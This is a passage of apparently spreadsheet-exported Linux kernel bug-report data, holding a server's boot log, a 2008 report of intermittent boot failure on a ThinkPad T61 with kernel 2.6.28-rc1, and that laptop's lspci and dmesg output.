64 pci 0000:01:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:01:00.0: setting latency timer to 64 pci 0000:02:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:02:00.0: setting latency timer to 64 pci 0000:03:00.0: setting latency timer to 64 pci 0000:03:00.2: setting latency timer to 64 pci 0000:02:02.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 pci 0000:02:02.0: setting latency timer to 64 pci 0000:01:00.3: setting latency timer to 64 pci 0000:00:04.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:00:04.0: setting latency timer to 64 pci 0000:00:06.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:00:06.0: setting latency timer to 64 pci 0000:00:1c.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 pci 0000:00:1c.0: setting latency timer to 64 pci 0000:00:1e.0: setting latency timer to 64 bus: 00 index 0 io port: [0x00-0xffff] bus: 00 index 1 mmio: [0x000000-0xffffffffffffffff] bus: 01 index 0 io port: [0x2000-0x3fff] bus: 01 index 1 mmio: [0xc8100000-0xc83fffff] bus: 01 index 2 mmio: [0xc2000000-0xc21fffff] bus: 01 index 3 mmio: [0x0-0x0] bus: 02 index 0 io port: [0x2000-0x3fff] bus: 02 index 1 mmio: [0xc8200000-0xc83fffff] bus: 02 index 2 mmio: [0xc2000000-0xc21fffff] bus: 02 index 3 mmio: [0x0-0x0] bus: 03 index 0 io port: [0x2000-0x2fff] bus: 03 index 1 mmio: [0xc8200000-0xc82fffff] bus: 03 index 2 mmio: [0xc2000000-0xc20fffff] bus: 03 index 3 mmio: [0x0-0x0] bus: 04 index 0 io port: [0x2000-0x2fff] bus: 04 index 1 mmio: [0xc8200000-0xc82fffff] bus: 04 index 2 mmio: [0xc2000000-0xc20fffff] bus: 04 index 3 mmio: [0x0-0x0] bus: 05 index 0 mmio: [0x0-0x0] bus: 05 index 1 mmio: [0x0-0x0] bus: 05 index 2 mmio: [0x0-0x0] bus: 05 index 3 mmio: [0x0-0x0] bus: 06 index 0 io port: [0x3000-0x3fff] bus: 06 index 1 mmio: [0xc8300000-0xc83fffff] bus: 06 index 2 mmio: [0xc2100000-0xc21fffff] bus: 06 index 3 mmio: [0x0-0x0] bus: 07 index 0 mmio: [0x0-0x0] bus: 07 index 1 mmio: [0x0-0x0] bus: 07 index 2 mmio: [0x0-0x0] bus: 07 index 3 mmio: [0x0-0x0] bus: 08 index 0 mmio: [0x0-0x0] bus: 08 index 1 mmio: [0x0-0x0] bus: 08 index 2 mmio: [0x0-0x0] bus: 08 index 3 mmio: [0x0-0x0] bus: 09 index 0 mmio: [0x0-0x0] bus: 09 index 1 mmio: [0x0-0x0] bus: 09 index 2 mmio: [0x0-0x0] bus: 09 index 3 mmio: [0x0-0x0] bus: 0a index 0 mmio: [0x0-0x0] bus: 0a index 1 mmio: [0x0-0x0] bus: 0a index 2 mmio: [0x0-0x0] bus: 0a index 3 mmio: [0x0-0x0] bus: 0b index 0 io port: [0x4000-0x4fff] bus: 0b index 1 mmio: [0xc8400000-0xc84fffff] bus: 0b index 2 mmio: [0xd0000000-0xd7ffffff] bus: 0b index 3 io port: [0x00-0xffff] bus: 0b index 4 mmio: [0x000000-0xffffffffffffffff] NET: Registered protocol family 2 IP route cache hash table entries: 131072 (order: 8, 1048576 bytes) TCP established hash table entries: 262144 (order: 10, 4194304 bytes) TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) TCP: Hash tables configured (established 262144 bind 65536) TCP reno registered NET: Registered protocol family 1 checking if image is initramfs... it is Freeing initrd memory: 1239k freed Simple Boot Flag at 0x38 set to 0x1 HugeTLB registered 2 MB page size, pre-allocated 0 pages Installing knfsd (copyright (C) 1996 okir@monad.swb.de). msgmni has been set to 7893 io scheduler noop registered io scheduler anticipatory registered (default) io scheduler deadline registered io scheduler cfq registered pci 0000:0b:01.0: Boot video device input: Power Button (FF) as /class/input/input0 ACPI: Power Button (FF) [PWRF] input: Power Button (CM) as /class/input/input1 ACPI: Power Button (CM) [PWRB] ACPI: SSDT BFF64605, 0200 (r1 PmRef Cpu0Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00C6) - 5 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:00: registered as cooling_device0 ACPI: Processor [CPU0] (supports 8 throttling states) ACPI: SSDT BFF64805, 0066 (r1 PmRef Cpu1Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00C9) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:01: registered as cooling_device1 ACPI: Processor [CPU1] (supports 8 throttling states) ACPI: SSDT BFF6486B, 0066 (r1 PmRef Cpu2Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00CC) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:02: registered as cooling_device2 ACPI: Processor [CPU2] (supports 8 throttling states) ACPI: SSDT BFF648D1, 0066 (r1 PmRef Cpu3Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00CF) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:03: registered as cooling_device3 ACPI: Processor [CPU3] (supports 8 throttling states) ACPI: SSDT BFF64937, 0066 (r1 PmRef CPU4Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00D2) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:04: registered as cooling_device4 ACPI: Processor [CPU4] (supports 8 throttling states) ACPI: SSDT BFF6499D, 0066 (r1 PmRef CPU5Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00D5) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:05: registered as cooling_device5 ACPI: Processor [CPU5] (supports 8 throttling states) ACPI: SSDT BFF64A03, 0066 (r1 PmRef Cpu6Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00D8) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:06: registered as cooling_device6 ACPI: Processor [CPU6] (supports 8 throttling states) ACPI: SSDT BFF64A69, 0066 (r1 PmRef Cpu7Ist 3000 INTL 20050228) Parsing all Control Methods: Table [SSDT](id 00DB) - 3 Objects with 0 Devices 2 Methods 0 Regions processor ACPI0007:07: registered as cooling_device7 ACPI: Processor [CPU7] (supports 8 throttling states) Real Time Clock Driver v1.12ac intel_rng: FWH not detected Linux agpgart interface v0.103 Hangcheck: starting hangcheck timer 0.9.0 (tick is 180 seconds, margin is 60 seconds). Hangcheck: Using get_cycles(). Serial: 8250/16550 driver4 ports, IRQ sharing disabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A 00:09: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:0a: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 brd: module loaded loop: module loaded Intel(R) PRO/1000 Network Driver - version 7.3.20-k3-NAPI Copyright (c) 1999-2006 Intel Corporation. console [netcon0] enabled netconsole: network logging started Uniform Multi-Platform E-IDE driver piix 0000:00:1f.1: IDE controller (0x8086:0x269e rev 0x09) pci 0000:00:1f.1: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 piix 0000:00:1f.1: IDE port disabled piix 0000:00:1f.1: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x1860-0x1867 Probing IDE interface ide0... hdb: LITE-ON COMBO SOHC-5236V, ATAPI CD/DVD-ROM drive hdb: host max PIO4 wanted PIO255(auto-tune) selected PIO4 hdb: UDMA/44 mode selected ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports ide-gd driver 1.18 ide-cd driver 5.00 ide-cd: hdb: ATAPI 52X DVD-ROM CD-R/RW drive, 1536kB Cache Uniform CD-ROM driver Revision: 3.20 aic79xx 0000:04:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 scsi0 : Adaptec AIC79XX PCI-X SCSI HBA DRIVER, Rev 3.0 &lt;Adaptec AIC7902 Ultra320 SCSI adapter&gt; aic7902: Ultra320 Wide Channel A, SCSI Id=7, PCI-X 67-100MHz, 512 SCBs scsi 0:0:6:0: Direct-Access HITACHI HUS103073FL3800 SA1B PQ: 0 ANSI: 3 target0:0:6: asynchronous scsi0:A:6:0: Tagged Queuing enabled. Depth 32 target0:0:6: Beginning Domain Validation target0:0:6: wide asynchronous target0:0:6: FAST-160 WIDE SCSI 320.0 MB/s DT IU QAS RDSTRM RTI WRFLOW PCOMP (6.25 ns, offset 80) target0:0:6: Ending Domain Validation scsi 0:0:8:0: Processor SUPER GEM359 REV001 1.09 PQ: 0 ANSI: 2 target0:0:8: asynchronous target0:0:8: Beginning Domain Validation target0:0:8: Ending Domain Validation scsi 0:0:9:0: Direct-Access SEAGATE ST336607LC 0007 PQ: 0 ANSI: 3 target0:0:9: asynchronous scsi0:A:9:0: Tagged Queuing enabled. Depth 32 target0:0:9: Beginning Domain Validation target0:0:9: wide asynchronous target0:0:9: FAST-160 WIDE SCSI 320.0 MB/s DT IU QAS RDSTRM RTI WRFLOW PCOMP (6.25 ns, offset 63) target0:0:9: Ending Domain Validation aic79xx 0000:04:02.1: PCI INT B -&gt; GSI 17 (level, low) -&gt; IRQ 17 scsi1 : Adaptec AIC79XX PCI-X SCSI HBA DRIVER, Rev 3.0 &lt;Adaptec AIC7902 Ultra320 SCSI adapter&gt; aic7902: Ultra320 Wide Channel B, SCSI Id=7, PCI-X 67-100MHz, 512 SCBs Driver 'sd' needs updating - please use bus_type methods sd 0:0:6:0: [sda] 143374805 512-byte hardware sectors: (73.4 GB/68.3 GiB) sd 0:0:6:0: [sda] Write Protect is off sd 0:0:6:0: [sda] Mode Sense: c3 00 10 08 sd 0:0:6:0: [sda] Write cache: enabled, read cache: enabled, supports DPO and FUA sd 0:0:6:0: [sda] 143374805 512-byte hardware sectors: (73.4 GB/68.3 GiB) sd 0:0:6:0: [sda] Write Protect is off sd 0:0:6:0: [sda] Mode Sense: c3 00 10 08 sd 0:0:6:0: [sda] Write cache: enabled, read cache: enabled, supports DPO and FUA sda: sda1 sda2 sd 0:0:6:0: [sda] Attached SCSI disk sd 0:0:9:0: [sdb] 71687372 512-byte hardware sectors: (36.7 GB/34.1 GiB) sd 0:0:9:0: [sdb] Write Protect is off sd 0:0:9:0: [sdb] Mode Sense: ab 00 10 08 sd 0:0:9:0: [sdb] Write cache: enabled, read cache: enabled, supports DPO and FUA sd 0:0:9:0: [sdb] 71687372 512-byte hardware sectors: (36.7 GB/34.1 GiB) sd 0:0:9:0: [sdb] Write Protect is off sd 0:0:9:0: [sdb] Mode Sense: ab 00 10 08 sd 0:0:9:0: [sdb] Write cache: enabled, read cache: enabled, supports DPO and FUA sdb: sdb1 sdb2 sd 0:0:9:0: [sdb] Attached SCSI disk PNP: PS/2 Controller [PNP0303:KBC0,PNP0f13:MSE0] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice dcdbas dcdbas: Dell Systems Management Base Driver (version 5.6.0-3.2) oprofile: using NMI interrupt. TCP cubic registered input: AT Translated Set 2 keyboard as /class/input/input2 NET: Registered protocol family 10 IPv6 over IPv4 tunneling driver NET: Registered protocol family 17 RPC: Registered udp transport module. RPC: Registered tcp transport module. Freeing unused kernel memory: 328k freed end_request: I/O error, dev fd0, sector 0 end_request: I/O error, dev fd0, sector 0 EXT3-fs: INFO: recovery required on readonly filesystem. EXT3-fs: write access will be enabled during recovery. input: PS/2 Generic Mouse as /class/input/input3 kjournald starting. Commit interval 5 seconds EXT3-fs: recovery complete. EXT3-fs: mounted filesystem with ordered data mode. e1000e: Intel(R) PRO/1000 Network Driver - 0.3.3.3-k6 e1000e: Copyright (c) 1999-2008 Intel Corporation. e1000e 0000:06:00.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 e1000e 0000:06:00.0: setting latency timer to 64 e1000e 0000:06:00.0: irq 95 for MSI/MSI-X 0000:06:00.0: eth0: (PCI Express:2.5GB/s:Width x4) 00:30:48:30:61:16 0000:06:00.0: eth0: Intel(R) PRO/1000 Network Connection 0000:06:00.0: eth0: MAC: 4, PHY: 5, PBA No: ffffff-0ff e1000e 0000:06:00.1: PCI INT B -&gt; GSI 19 (level, low) -&gt; IRQ 19 e1000e 0000:06:00.1: setting latency timer to 64 e1000e 0000:06:00.1: irq 94 for MSI/MSI-X 0000:06:00.1: eth1: (PCI Express:2.5GB/s:Width x4) 00:30:48:30:61:17 0000:06:00.1: eth1: Intel(R) PRO/1000 Network Connection 0000:06:00.1: eth1: MAC: 4, PHY: 5, PBA No: ffffff-0ff EXT3 FS on sda1, internal journal Adding 4096564k swap on /dev/sda2. Priority:-1 extents:1 across:4096564k Adding 5123064k swap on /dev/sdb2. Priority:-2 extents:1 across:5123064k platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 platform microcode: firmware: requesting intel-ucode/06-0f-07 Microcode Update Driver: v2.00 &lt;tigran@aivazian.fsnet.co.uk&gt; &lt;peter.oruba@amd.com&gt; Microcode Update Driver: v2.00 removed. warning: process `kudzu' used the deprecated sysctl system call with 1.23. process `sysctl' is using deprecated sysctl (syscall) net.ipv6.neigh.default.retrans_time; Use net.ipv6.neigh.default.retrans_time_ms instead. e1000e 0000:06:00.0: irq 95 for MSI/MSI-X e1000e 0000:06:00.0: irq 95 for MSI/MSI-X ADDRCONF(NETDEV_UP): eth0: link is not ready 0000:06:00.0: eth0: Link is Up 1000 Mbps Full Duplex, Flow Control: None ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready warning: `dbus-daemon' uses 32-bit capabilities (legacy support in use) eth0: no IPv6 routers present</t>
  </si>
  <si>
    <t>sometime boot failed on T61 laptop</t>
  </si>
  <si>
    <t>2008-10-30 02:04 UTC</t>
  </si>
  <si>
    <t>2008-11-22 13:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27 Earliest failing kernel version:2.6.28-rc1 Distribution:FC 8 Hardware Environment: IBM T61 Software Environment: Problem Description: most of time, the boot failed. but ocasionally boot works. Steps to reproduce: reboot lspci: 00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 0c) Subsystem: Lenovo Unknown device 20b3 Flags: bus master, fast devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) (prog-if 00 [VGA]) Subsystem: Lenovo Unknown device 20b5 Flags: bus master, fast devsel, latency 0, IRQ 10 Memory at f8100000 (64-bit, non-prefetchable) [size=1M] Memory at e0000000 (64-bit, prefetchable) [size=256M] I/O ports at 1800 [size=8] Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [d0] Power Management version 3 00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) Subsystem: Lenovo Unknown device 20b5 Flags: bus master, fast devsel, latency 0 Memory at f8200000 (64-bit, non-prefetchable) [size=1M] Capabilities: [d0] Power Management version 3 00:19.0 Ethernet controller: Intel Corporation 82566MM Gigabit Network Connection (rev 03) Subsystem: Lenovo Lenovo Thinkpad T61 Flags: bus master, fast devsel, latency 0, IRQ 217 Memory at fe000000 (32-bit, non-prefetchable) [size=128K] Memory at fe025000 (32-bit, non-prefetchable) [size=4K] I/O ports at 1840 [size=32] Capabilities: [c8] Power Management version 2 Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable+ 00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Contoller #4 (rev 03) (prog-if 00 [UHCI]) Subsystem: Lenovo Lenovo Thinkpad T61 Flags: bus master, medium devsel, latency 0, IRQ 20 I/O ports at 1860 [size=32] 00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03) (prog-if 00 [UHCI]) Subsystem: Lenovo Lenovo Thinkpad T60 Flags: bus master, medium devsel, latency 0, IRQ 21 I/O ports at 1880 [size=32] 00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03) (prog-if 20 [EHCI]) Subsystem: Lenovo Lenovo Thinkpad T61 Flags: bus master, medium devsel, latency 0, IRQ 22 Memory at fe226c00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03) Subsystem: Lenovo Lenovo Thinkpad T61 Flags: bus master, fast devsel, latency 0, IRQ 17 Memory at fe020000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Capabilities: [70] Express Unknown type IRQ 0 Capabilities: [100] Virtual Channel Capabilities: [130] Unknown (5) 00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 00002000-00002fff Memory behind bridge: fc000000-fdffffff Prefetchable memory behind bridge: 00000000f8000000-00000000f80fffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Capabilities: [90] Subsystem: Lenovo Unknown device 20ad Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 00003000-00003fff Memory behind bridge: dc000000-df3fffff Prefetchable memory behind bridge: 00000000dfe00000-00000000dfefffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Capabilities: [90] Subsystem: Lenovo Unknown device 20ad Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: d8000000-d9ffffff Prefetchable memory behind bridge: 00000000dfb00000-00000000dfbfffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Capabilities: [90] Subsystem: Lenovo Unknown device 20ad Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1c.3 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 4 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=05, subordinate=0c, sec-latency=0 I/O behind bridge: 00005000-00005fff Memory behind bridge: d4000000-d5ffffff Prefetchable memory behind bridge: 00000000df800000-00000000df8fffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Capabilities: [90] Subsystem: Lenovo Unknown device 20ad Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1c.4 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 5 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=0d, subordinate=14, sec-latency=0 I/O behind bridge: 00006000-00006fff Memory behind bridge: d0000000-d1ffffff Prefetchable memory behind bridge: 00000000df500000-00000000df5fffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable+ Capabilities: [90] Subsystem: Lenovo Unknown device 20ad Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: Lenovo Unknown device 20aa Flags: bus master, medium devsel, latency 0, IRQ 16 I/O ports at 18a0 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03) (prog-if 00 [UHCI]) Subsystem: Lenovo Unknown device 20aa Flags: bus master, medium devsel, latency 0, IRQ 17 I/O ports at 18c0 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 03) (prog-if 00 [UHCI]) Subsystem: Lenovo Unknown device 20aa Flags: bus master, medium devsel, latency 0, IRQ 18 I/O ports at 18e0 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03) (prog-if 20 [EHCI]) Subsystem: Lenovo Unknown device 20ab Flags: bus master, medium devsel, latency 0, IRQ 19 Memory at fe227000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Capabilities: [58] Debug port 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3) (prog-if 01 [Subtractive decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=15, subordinate=18, sec-latency=32 I/O behind bridge: 00007000-0000afff Memory behind bridge: f8300000-fbffffff Prefetchable memory behind bridge: 00000000f4000000-00000000f7ffffff Capabilities: [50] Subsystem: Lenovo Unknown device 20ae 00:1f.0 ISA bridge: Intel Corporation 82801HBM (ICH8M-E) LPC Interface Controller (rev 03) Subsystem: Lenovo Unknown device 20b6 Flags: bus master, medium devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00:1f.1 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller (rev 03) (prog-if 8a [Master SecP PriP]) Subsystem: Lenovo Unknown device 20a6 Flags: bus master, medium devsel, latency 0, IRQ 16 I/O ports at 01f0 [size=8] I/O ports at 03f4 [size=1] I/O ports at 0170 [size=8] I/O ports at 0374 [size=1] I/O ports at 1c00 [size=16] 00:1f.2 SATA controller: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA AHCI Controller (rev 03) (prog-if 01 [AHCI 1.0]) Subsystem: Lenovo Unknown device 20a7 Flags: bus master, 66MHz, medium devsel, latency 0, IRQ 218 I/O ports at 1c50 [size=8] I/O ports at 1c44 [size=4] I/O ports at 1c48 [size=8] I/O ports at 1c40 [size=4] I/O ports at 1c20 [size=32] Memory at fe226000 (32-bit, non-prefetchable) [size=2K] Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/2 Enable+ Capabilities: [70] Power Management version 3 Capabilities: [a8] #12 [0010] 00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 03) Subsystem: Lenovo Unknown device 20a9 Flags: medium devsel, IRQ 23 Memory at fe227400 (32-bit, non-prefetchable) [size=256] I/O ports at 1c60 [size=32] 03:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02) Subsystem: Intel Corporation Unknown device 1010 Flags: fast devsel, IRQ 17 Memory at df3ff000 (32-bit, non-prefetchable) [size=4K] Capabilities: [c8] Power Management version 2 Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Capabilities: [e0] Express Legacy Endpoint IRQ 0 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number a3-90-06-ff-ff-77-1b-00 15:00.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev ba) Subsystem: Lenovo Unknown device 20c6 Flags: bus master, medium devsel, latency 168, IRQ 16 Memory at f8300000 (32-bit, non-prefetchable) [size=4K] Bus: primary=15, secondary=16, subordinate=17, sec-latency=176 Memory window 0: f4000000-f7fff000 (prefetchable) Memory window 1: 40000000-43fff000 I/O window 0: 00007000-000070ff I/O window 1: 00007400-000074ff 16-bit legacy interface ports at 0001 15:00.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 04) (prog-if 10 [OHCI]) Subsystem: Lenovo Unknown device 20c7 Flags: bus master, medium devsel, latency 64, IRQ 17 Memory at f8301000 (32-bit, non-prefetchable) [size=2K] Capabilities: [dc] Power Management version 2 15:00.2 Generic system peripheral [0805]: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 21) Subsystem: Lenovo Unknown device 20c8 Flags: bus master, medium devsel, latency 0, IRQ 11 Memory at f8301800 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 15:00.3 System peripheral: Ricoh Co Ltd Unknown device 0843 (rev 11) Subsystem: Lenovo Unknown device 20c9 Flags: bus master, medium devsel, latency 0, IRQ 11 Memory at f8301c00 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 15:00.4 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 11) Subsystem: Lenovo Unknown device 20ca Flags: medium devsel, IRQ 11 Memory at f8302000 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 15:00.5 System peripheral: Ricoh Co Ltd xD-Picture Card Controller (rev 11) Subsystem: Lenovo Unknown device 20cb Flags: medium devsel, IRQ 11 Memory at f8302400 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 dmesg of 2.6.27 ( comments following '###' is compare to 2.6.28-rc2) : Linux version 2.6.27 (alexs@lkp-t61) (gcc version 4.1.2 20070925 (Red Hat 4.1.2-33)) #1 SMP Tue Oct 14 18:02:00 CST 2008 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009d800 (usable) BIOS-e820: 000000000009d800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000d2000 - 00000000000d4000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000003e6b0000 (usable) BIOS-e820: 000000003e6b0000 - 000000003e6cc000 (ACPI data) BIOS-e820: 000000003e6cc000 - 000000003e700000 (ACPI NVS) BIOS-e820: 000000003e700000 - 000000003f000000 (reserved) BIOS-e820: 00000000f0000000 - 00000000f4000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fed00000 - 00000000fed00400 (reserved) BIOS-e820: 00000000fed14000 - 00000000fed1a000 (reserved) BIOS-e820: 00000000fed1c000 - 00000000fed90000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000ff000000 - 0000000100000000 (reserved) last_pfn = 0x3e6b0 max_arch_pfn = 0x100000 kernel direct mapping tables up to 38000000 @ 7000-c000 RAMDISK: 37d0e000 - 37fef6bf DMI present. ACPI: RSDP 000F68D0, 0024 (r2 LENOVO) ACPI: XSDT 3E6BB74B, 0094 (r1 LENOVO TP-7L 2090 LTP 0) ACPI: FACP 3E6BB800, 00F4 (r3 LENOVO TP-7L 2090 LNVO 1) ACPI Warning (tbfadt-0442): Optional field "Gpe1Block" has zero address or length: 000000000000102C/0 [20080609] ACPI: DSDT 3E6BBC1D, FF05 (r1 LENOVO TP-7L 2090 MSFT 3000000) ACPI: FACS 3E6E4000, 0040 ACPI: SSDT 3E6BB9B4, 0269 (r1 LENOVO TP-7L 2090 MSFT 3000000) ACPI: ECDT 3E6CBB22, 0052 (r1 LENOVO TP-7L 2090 LNVO 1) ACPI: TCPA 3E6CBB74, 0032 (r2 LENOVO TP-7L 2090 LNVO 1) ACPI: APIC 3E6CBBA6, 0068 (r1 LENOVO TP-7L 2090 LNVO 1) ACPI: MCFG 3E6CBC0E, 003C (r1 LENOVO TP-7L 2090 LNVO 1) ACPI: HPET 3E6CBC4A, 0038 (r1 LENOVO TP-7L 2090 LNVO 1) ACPI: SLIC 3E6CBDF0, 0176 (r1 LENOVO TP-7L 2090 LTP 0) ACPI: BOOT 3E6CBF66, 0028 (r1 LENOVO TP-7L 2090 LTP 1) ACPI: ASF! 3E6CBF8E, 0072 (r16 LENOVO TP-7L 2090 PTL 1) ACPI: SSDT 3E6E2697, 025F (r1 LENOVO TP-7L 2090 INTL 20050513) ACPI: SSDT 3E6E28F6, 00A6 (r1 LENOVO TP-7L 2090 INTL 20050513) ACPI: SSDT 3E6E299C, 04F7 (r1 LENOVO TP-7L 2090 INTL 20050513) ACPI: SSDT 3E6E2E93, 01D8 (r1 LENOVO TP-7L 2090 INTL 20050513) ACPI: DMI detected: Lenovo ThinkPad T61 ACPI: Added _OSI(Linux) 102MB HIGHMEM available. 896MB LOWMEM available. mapped low ram: 0 - 38000000 low ram: 00000000 - 38000000 bootmap 00008000 - 0000f000 (9 early reservations) ==&gt; bootmem [0000000000 - 0038000000] #0 [0000000000 - 0000001000] BIOS data page ==&gt; [0000000000 - 0000001000] #1 [0000001000 